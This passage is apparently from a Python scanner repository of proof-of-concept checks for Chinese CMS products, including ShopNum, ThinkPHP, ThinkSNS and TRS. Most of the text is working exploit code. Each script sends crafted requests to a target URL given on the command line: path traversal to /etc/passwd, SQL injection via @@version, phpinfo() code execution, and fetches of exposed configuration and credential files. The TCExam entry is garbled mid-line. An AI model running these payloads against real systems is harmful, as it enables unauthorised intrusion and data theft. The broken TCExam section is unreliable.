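            # body is not authenticated as coming from the intended host.
            resp = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # A PHP variable name in the body indicates unexecuted source.
            if r"$DB_site" in resp.text:
                cprint("[+]存在Shadows-IT selector.php 任意文件包含漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt and
            # SystemExit. Every failure is still printed with the timeout text.
            cprint("[-] "+__file__+"====>连接超时", "cyan")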
31 |
if __name__ == "__main__":
    # Script entry point: argv[1] is the base URL handed to the check.
    # The blanket filter hides every warning, including the one requests
    # emits when verify=False is used.
    warnings.filterwarnings("ignore")
    shadowsit_selector_lfi_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/shop360/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/shop360/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/shop360/shop360_do_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 启博淘店通标准版任意文件遍历漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0148274
6 | author: Lucifer
7 | description: /?mod=goods&do=index&class_id=25,参数do未过滤存在任意文件遍历。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
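class shop360_do_filedownload_BaseVerify:
    """Check one host for path traversal through the `do` parameter.

    The probe points `do` at /etc/passwd with a NUL-terminated `.jpg`
    suffix. The host is reported when the body contains both `root:` and
    `/bin/bash`. A host whose root shell is not bash is therefore missed
    even if the file is returned.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding or a connection error."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/?mod=goods&do=../../../../../../../../../etc/passwd%00.jpg&class_id=25"
        vulnurl = self.url + payload
        try:
            # verify=False skips TLS certificate validation, so the inspected
            # body is not authenticated as coming from the intended host.
            resp = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            body = resp.text
            if r"root:" in body and r"/bin/bash" in body:
                cprint("[+]存在启博淘店通标准版任意文件遍历漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt and
            # SystemExit. Every failure is still printed with the timeout text.
            cprint("[-] "+__file__+"====>连接超时", "cyan")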
31 |
if __name__ == "__main__":
    # Script entry point: argv[1] is the base URL handed to the check.
    # The blanket filter hides every warning, including the one requests
    # emits when verify=False is used.
    warnings.filterwarnings("ignore")
    shop360_do_filedownload_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/shop7z/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/shop7z/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/shopex/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/shopex/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/shopex/shopex_phpinfo_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: shopex敏感信息泄露
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0100121
6 | author: Lucifer
7 | description: 路径 app/dev/svinfo.php,打开后可看到服务器测评信息及phpinfo等相关敏感信息。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
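class shopex_phpinfo_disclosure_BaseVerify:
    """Check one host for an exposed shopex svinfo.php diagnostics page.

    Requests /app/dev/svinfo.php with `phpinfo=true` and reports the host
    when the phpinfo banner text is present. The page discloses server
    configuration; removing or access-restricting the dev script closes it.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding or a connection error."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
        }
        payload = "/app/dev/svinfo.php?phpinfo=true"
        vulnurl = self.url + payload
        try:
            # verify=False skips TLS certificate validation, so the inspected
            # body is not authenticated as coming from the intended host.
            resp = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # This phrase is a row label of the phpinfo() output page.
            if r"Configuration File (php.ini) Path" in resp.text:
                cprint("[+]存在shopex敏感信息泄露...(敏感信息)\tpayload: "+vulnurl, "green")
        except Exception:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt and
            # SystemExit. Every failure is still printed with the timeout text.
            cprint("[-] "+__file__+"====>连接超时", "cyan")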
32 |
if __name__ == "__main__":
    # Script entry point: argv[1] is the base URL handed to the check.
    # The blanket filter hides every warning, including the one requests
    # emits when verify=False is used.
    warnings.filterwarnings("ignore")
    shopex_phpinfo_disclosure_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/shopnc/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/shopnc/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/shopnum/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/shopnum/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/shopnum/shopnum_GuidBuyList_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: shopnum1 GuidBuyList.aspx SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0118447
6 | author: Lucifer
7 | description: 文件GuidBuyList.aspx中,参数guid存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
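class shopnum_GuidBuyList_sqli_BaseVerify:
    """Check one host for SQL injection in `guid` of GuidBuyList.aspx.

    The probe compares the string "BBB" + @@version with 0 and reports the
    host when `BBBMicrosoft` appears in the response. It therefore depends
    on the database error text being returned to the client; with custom
    error pages enabled a vulnerable host is not reported.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding or a connection error."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/GuidBuyList.aspx?guid=97dcbadc-9b4f-4ff5-9ffb-17e46e10d66d%27AnD(ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsiOn)%3E0--"
        vulnurl = self.url + payload
        try:
            # verify=False skips TLS certificate validation, so the inspected
            # body is not authenticated as coming from the intended host.
            resp = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"BBBMicrosoft" in resp.text:
                cprint("[+]存在shopnum1 GuidBuyList.aspx SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt and
            # SystemExit. Every failure is still printed with the timeout text.
            cprint("[-] "+__file__+"====>连接超时", "cyan")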
31 |
if __name__ == "__main__":
    # Script entry point: argv[1] is the base URL handed to the check.
    # The blanket filter hides every warning, including the one requests
    # emits when verify=False is used.
    warnings.filterwarnings("ignore")
    shopnum_GuidBuyList_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/shopnum/shopnum_ProductDetail_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: shopnum1 ProductDetail.aspx SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0118447
6 | author: Lucifer
7 | description: 文件 /ProductDetail.aspx 中,参数guid存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
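class shopnum_ProductDetail_sqli_BaseVerify:
    """Check one host for SQL injection in `guid` of ProductDetail.aspx.

    The probe compares the string "BBB" + @@version with 0 and reports the
    host when `BBBMicrosoft` appears in the response. It therefore depends
    on the database error text being returned to the client; with custom
    error pages enabled a vulnerable host is not reported.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding or a connection error."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/ProductDetail.aspx?guid=6e1c9384-232c-4ee0-ada4-14562136d755%27AnD(ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsiOn)%3E0--"
        vulnurl = self.url + payload
        try:
            # verify=False skips TLS certificate validation, so the inspected
            # body is not authenticated as coming from the intended host.
            resp = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"BBBMicrosoft" in resp.text:
                cprint("[+]存在shopnum1 ProductDetail.aspx SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt and
            # SystemExit. Every failure is still printed with the timeout text.
            cprint("[-] "+__file__+"====>连接超时", "cyan")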
31 |
if __name__ == "__main__":
    # Script entry point: argv[1] is the base URL handed to the check.
    # The blanket filter hides every warning, including the one requests
    # emits when verify=False is used.
    warnings.filterwarnings("ignore")
    shopnum_ProductDetail_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/shopnum/shopnum_ShoppingCart1_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: shopnum ShoppingCart1 SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-118610
6 | author: Lucifer
7 | description: 文件/ShoppingCart1.html中,参数MemLoginID存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
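class shopnum_ShoppingCart1_sqli_BaseVerify:
    """Check one host for SQL injection in `MemLoginID` of ShoppingCart1.html.

    The probe compares the string "BBB" + @@version with 0 and reports the
    host when `BBBMicrosoft` appears in the response. It therefore depends
    on the database error text being returned to the client; with custom
    error pages enabled a vulnerable host is not reported.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding or a connection error."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/ShoppingCart1.html?MemLoginID=200200%27AnD(ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsiOn)%3E0--"
        vulnurl = self.url + payload
        try:
            # verify=False skips TLS certificate validation, so the inspected
            # body is not authenticated as coming from the intended host.
            resp = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"BBBMicrosoft" in resp.text:
                cprint("[+]存在shopnum ShoppingCart1 SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt and
            # SystemExit. Every failure is still printed with the timeout text.
            cprint("[-] "+__file__+"====>连接超时", "cyan")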
31 |
if __name__ == "__main__":
    # Script entry point: argv[1] is the base URL handed to the check.
    # The blanket filter hides every warning, including the one requests
    # emits when verify=False is used.
    warnings.filterwarnings("ignore")
    shopnum_ShoppingCart1_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/siteengine/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/siteengine/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/siteserver/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/siteserver/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/smartoa/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/smartoa/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/speedcms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/speedcms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/tcexam/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/tcexam/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/tcexam/tcexam_reinstall_getshell.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: TCExam重新安装可getshell漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-046974
6 | author: Lucifer
7 | description: /install/install.php文件可以重新安装,在任意输入框中写入 ');?>连接超时", "cyan")
31 |
if __name__ == "__main__":
    # Script entry point: argv[1] is the base URL handed to the check.
    # The blanket filter hides every warning raised while the check runs.
    warnings.filterwarnings("ignore")
    tcexam_reinstall_getshell_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/thinkphp/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/thinkphp/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/thinkphp/thinkphp_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: ThinkPHP 代码执行漏洞
5 | referer: http://zone.wooyun.org/index.php?do=view&id=44
6 | author: Lucifer
7 | description: ThinkPHP 版本3.0~3.1开启Lite模式后preg_replace使用了/e选项,同时第二个参数使用双引号,所以造成了代码执行,可直接GETSHELL
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
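class thinkphp_code_exec_BaseVerify:
    """Check one host for the ThinkPHP URL-path code execution issue.

    The file header attributes the issue to ThinkPHP 3.0-3.1 in Lite mode,
    where a preg_replace with the /e modifier evaluates path segments. The
    probe places a phpinfo() call in the path and reports the host when the
    phpinfo banner text appears in the response.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding or a connection error."""
        payload = "/index.php/Index/index/name/$%7B@phpinfo%28%29%7D"
        vulnurl = self.url + payload
        try:
            # No custom headers here, so the default requests User-Agent is
            # sent. verify=False skips TLS certificate validation.
            resp = requests.get(vulnurl, timeout=10, verify=False)
            # This phrase is a row label of the phpinfo() output page.
            if r"Configuration File (php.ini) Path" in resp.text:
                cprint("[+]存在ThinkPHP 代码执行漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt and
            # SystemExit. Every failure is still printed with the timeout text.
            cprint("[-] "+__file__+"====>连接超时", "cyan")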
29 |
if __name__ == "__main__":
    # Script entry point: argv[1] is the base URL handed to the check.
    # The blanket filter hides every warning, including the one requests
    # emits when verify=False is used.
    warnings.filterwarnings("ignore")
    thinkphp_code_exec_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/thinksns/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/thinksns/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/thinksns/thinksns_category_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: thinksns category模块代码执行
5 | referer: Arice
6 | author: Lucifer,Arice
7 | description: 过滤不严导致的代码执行
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
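class thinksns_category_code_exec_BaseVerify:
    """Check one host for code execution in the thinksns Category widget.

    The probe supplies a crafted `id[task_to_run]` value ending in a
    phpinfo() call and reports the host when the phpinfo banner text appears
    in the response. The match is a plain substring test on the body.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding or a connection error."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id%5Btask_to_run%5D=addons/Area)->getAreaList();phpinfo();%23"
        vulnurl = self.url + payload
        try:
            # verify=False skips TLS certificate validation, so the inspected
            # body is not authenticated as coming from the intended host.
            resp = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # This phrase is a row label of the phpinfo() output page.
            if r"Configuration File (php.ini) Path" in resp.text:
                cprint("[+]存在thinksns category模块代码执行漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt and
            # SystemExit. Every failure is still printed with the timeout text.
            cprint("[-] "+__file__+"====>连接超时", "cyan")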
31 |
if __name__ == "__main__":
    # Script entry point: argv[1] is the base URL handed to the check.
    # The blanket filter hides every warning, including the one requests
    # emits when verify=False is used.
    warnings.filterwarnings("ignore")
    thinksns_category_code_exec_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/trs/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/trs/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/trs/trs_ids_auth_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: TRS ids身份认证信息泄露
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-039729
6 | author: Lucifer
7 | description: 敏感信息泄露。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
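class trs_ids_auth_disclosure_BaseVerify:
    """Check one host for an exposed TRS IDS debug environment page.

    Requests /ids/admin/debug/env.jsp without credentials and reports the
    host when the body contains three JVM property names. A hit means the
    debug page is served to unauthenticated clients; it should be removed or
    placed behind the admin login.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding or a connection error."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/ids/admin/debug/env.jsp"
        vulnurl = self.url + payload
        try:
            # verify=False skips TLS certificate validation, so the inspected
            # body is not authenticated as coming from the intended host.
            resp = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            body = resp.text
            # All three markers must be present to limit accidental matches.
            if r"JavaHome" in body and r"java.runtime.name" in body and r"java.vm.version" in body:
                cprint("[+]存在TRS ids身份认证信息泄露漏洞...(中危)\tpayload: "+vulnurl, "yellow")
        except Exception:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt and
            # SystemExit. Every failure is still printed with the timeout text.
            cprint("[-] "+__file__+"====>连接超时", "cyan")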
31 |
if __name__ == "__main__":
    # Script entry point: argv[1] is the base URL handed to the check.
    # The blanket filter hides every warning, including the one requests
    # emits when verify=False is used.
    warnings.filterwarnings("ignore")
    trs_ids_auth_disclosure_BaseVerify(sys.argv[1]).run()
36 |
--------------------------------------------------------------------------------
/pocs/cms/trs/trs_inforadar_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: TRS网络信息雷达4.6系统敏感信息泄漏到进后台
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-091999
6 | author: Lucifer
7 | description: 敏感文件init_sysUsers.xml中泄露了用户名和密码密文,可直接登录系统。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
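class trs_inforadar_disclosure_BaseVerify:
    """Check one host for an exposed TRS inforadar init_sysUsers.xml file.

    Per the file header, this XML holds user names and password
    ciphertexts. The host is reported when the body contains
    `java.beans.XMLDecoder` and `property`. Neither marker is specific to
    this file, so any XMLDecoder document served at that path matches.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding or a connection error."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/inforadar/jsp/xml/init_sysUsers.xml"
        vulnurl = self.url + payload
        try:
            # verify=False skips TLS certificate validation, so the inspected
            # body is not authenticated as coming from the intended host.
            resp = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            body = resp.text
            if r"java.beans.XMLDecoder" in body and r"property" in body:
                cprint("[+]存在TRS网络信息雷达4.6系统敏感信息泄漏漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt and
            # SystemExit. Every failure is still printed with the timeout text.
            cprint("[-] "+__file__+"====>连接超时", "cyan")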
31 |
if __name__ == "__main__":
    # Script entry point: argv[1] is the base URL handed to the check.
    # The blanket filter hides every warning, including the one requests
    # emits when verify=False is used.
    warnings.filterwarnings("ignore")
    trs_inforadar_disclosure_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/trs/trs_was40_passwd_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: TRS was40 passwd.htm页面泄露
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-38875
6 | author: Lucifer
7 | description: 文件passwd.htm泄露,攻击者可爆破修改密码。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
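class trs_was40_passwd_disclosure_BaseVerify:
    """Check one host for an exposed TRS WAS 4.0 password-change page.

    Requests /was40/passwd/passwd.htm without credentials and reports the
    host on HTTP 200 when the body contains `userPassword` and
    `domodifypassword.jsp`. A hit means the form is served to
    unauthenticated clients.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding or a connection error."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/was40/passwd/passwd.htm"
        vulnurl = self.url + payload
        try:
            # verify=False skips TLS certificate validation, so the inspected
            # body is not authenticated as coming from the intended host.
            resp = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # The status check keeps error pages that quote the path from matching.
            if resp.status_code == 200 and r"userPassword" in resp.text and r"domodifypassword.jsp" in resp.text:
                cprint("[+]存在TRS was40 passwd.htm页面泄露...(中危)\tpayload: "+vulnurl, "yellow")
        except Exception:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt and
            # SystemExit. Every failure is still printed with the timeout text.
            cprint("[-] "+__file__+"====>连接超时", "cyan")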
31 |
if __name__ == "__main__":
    # Script entry point: argv[1] is the base URL handed to the check.
    # The blanket filter hides every warning, including the one requests
    # emits when verify=False is used.
    warnings.filterwarnings("ignore")
    trs_was40_passwd_disclosure_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/trs/trs_was40_tree_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: TRS was40 tree导航树泄露
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-038875
6 | author: Lucifer
7 | description: 访问was40/tree可查看信息导航树。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
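class trs_was40_tree_disclosure_BaseVerify:
    """Check one host for an exposed TRS WAS 4.0 navigation tree.

    Requests /was40/tree without credentials and reports the host on HTTP
    200 when the body contains `tree?treekind=navigate` and `administrator`.
    The finding is printed at the lowest severity this file uses.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding or a connection error."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/was40/tree"
        vulnurl = self.url + payload
        try:
            # verify=False skips TLS certificate validation, so the inspected
            # body is not authenticated as coming from the intended host.
            resp = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if resp.status_code == 200 and r"tree?treekind=navigate" in resp.text and r"administrator" in resp.text:
                cprint("[+]存在TRS was40 tree导航树泄露漏洞...(低危)\tpayload: "+vulnurl, "green")
        except Exception:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt and
            # SystemExit. Every failure is still printed with the timeout text.
            cprint("[-] "+__file__+"====>连接超时", "cyan")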
31 |
if __name__ == "__main__":
    # Script entry point: argv[1] is the base URL handed to the check.
    # The blanket filter hides every warning, including the one requests
    # emits when verify=False is used.
    warnings.filterwarnings("ignore")
    trs_was40_tree_disclosure_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/trs/trs_was5_config_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: TRS was5配置文件泄露
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件/WEB-INF/classes/com/trs/was/resource/wasconfig.properties内容泄露。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
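class trs_was5_config_disclosure_BaseVerify:
    """Check one host for disclosure of the TRS WAS5 wasconfig.properties file.

    The probe passes the properties path under WEB-INF as `treefile` to
    /was5/web/tree and reports the host when the body contains `sysdriver`
    and `sysuser`. A hit means the handler serves files from WEB-INF, which
    the servlet container would otherwise keep private.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding or a connection error."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/was5/web/tree?treefile=/WEB-INF/classes/com/trs/was/resource/wasconfig.properties"
        vulnurl = self.url + payload
        try:
            # verify=False skips TLS certificate validation, so the inspected
            # body is not authenticated as coming from the intended host.
            resp = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            body = resp.text
            if r"sysdriver" in body and r"sysuser" in body:
                cprint("[+]存在TRS was5配置文件泄露漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt and
            # SystemExit. Every failure is still printed with the timeout text.
            cprint("[-] "+__file__+"====>连接超时", "cyan")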
31 |
if __name__ == "__main__":
    # Script entry point: argv[1] is the base URL handed to the check.
    # The blanket filter hides every warning, including the one requests
    # emits when verify=False is used.
    warnings.filterwarnings("ignore")
    trs_was5_config_disclosure_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/trs/trs_was5_download_templet.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: TRS was5 download_templet.jsp任意文件下载
5 | referer: http://reboot.cf/2017/01/12/TRS%E6%BC%8F%E6%B4%9E%E6%95%B4%E7%90%86
6 | author: Lucifer
7 | description: download_templet.jsp参数type存在任意文件下载,下载文件均为压缩包。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
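class trs_was5_download_templet_BaseVerify:
    """Check one host for arbitrary download via `type` in download_templet.jsp.

    The probe sets `type` to a relative path and reports the host when the
    response Content-Type contains `x-zip-compressed`. Only the header is
    inspected, so any zip response from that endpoint counts as a finding,
    whatever the archive holds.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding or a connection error."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/was5/admin/template/download_templet.jsp?type=../web/inc"
        vulnurl = self.url + payload
        try:
            # verify=False skips TLS certificate validation, so the inspected
            # response is not authenticated as coming from the intended host.
            resp = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # .get() with a default: a response without a Content-Type header
            # used to raise KeyError and be reported as a connection timeout.
            if r"x-zip-compressed" in resp.headers.get("Content-Type", ""):
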